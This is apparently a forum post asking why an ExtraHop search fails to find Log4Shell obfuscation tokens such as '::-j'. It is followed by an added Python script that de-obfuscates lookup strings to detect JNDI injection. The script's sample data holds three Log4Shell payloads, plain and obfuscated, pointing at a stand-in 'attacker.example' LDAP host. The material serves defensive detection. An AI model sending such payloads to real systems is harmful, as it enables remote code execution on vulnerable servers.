I’m trying to crawl my storage appliance for these specific indicators (::-j, ::-n, ::-d, ::-i) for log4j-related traffic.
I understand that ExtraHop has deployed a cloud update to alert us on any log4shell jndi injection attempts. However, for some reason, all non-jndi injection attempts seem to be flagged by the cloud detector. Hence I’m trying to manually query them myself just to be sure.
The search filter, “AnyField ≈ ::-j”, somehow is not able to return any results that contain specifically ::-j.
Can anyone advise on this, please?
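As an added example (not from the poster, and not ExtraHop's own query logic): a small Python normaliser that resolves the `${...:-x}` default-value and `${lower:x}`/`${upper:x}` obfuscation that produces indicators like `::-j`, then checks the result for a JNDI lookup. The sample request lines and the `attacker.example` host are constructed for the demonstration.

```python
import re

# Log4j 2 lookup syntax: ${name:-default}. With an empty name, ${::-j}
# resolves to its default "j", which is why "::-j" shows up as an indicator.
# Assumption (not from the post): resolving the default-value form and the
# lower/upper case lookups is enough to expose the literal "jndi" string.
DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
CASE_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# The four tokens the post is searching for.
INDICATORS = ("::-j", "::-n", "::-d", "::-i")


def normalize(value: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups innermost-first until nothing changes."""
    for _ in range(max_rounds):
        new = DEFAULT_RE.sub(lambda m: m.group(1), value)
        new = CASE_RE.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


def indicators(value: str) -> list:
    """Return which of the post's literal indicators appear in the value."""
    return [tok for tok in INDICATORS if tok in value]


def is_suspicious(value: str) -> bool:
    """True if a JNDI lookup is present, either plainly or after de-obfuscation."""
    return bool(JNDI_RE.search(value) or JNDI_RE.search(normalize(value)))


# Constructed sample lines (not real captured traffic).
SAMPLE_LINES = [
    "GET /index.html HTTP/1.1",
    "User-Agent: ${jndi:ldap://attacker.example/a}",
    "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}",
    "Referer: ${${lower:j}ndi:ldap://attacker.example/a}",
]


def scan(lines=SAMPLE_LINES) -> list:
    """Return (line_index, indicators_found) for each suspicious line."""
    return [(i, indicators(l)) for i, l in enumerate(lines) if is_suspicious(l)]


if __name__ == "__main__":
    for idx, found in scan():
        print(f"line {idx}: suspicious, literal indicators {found}")
```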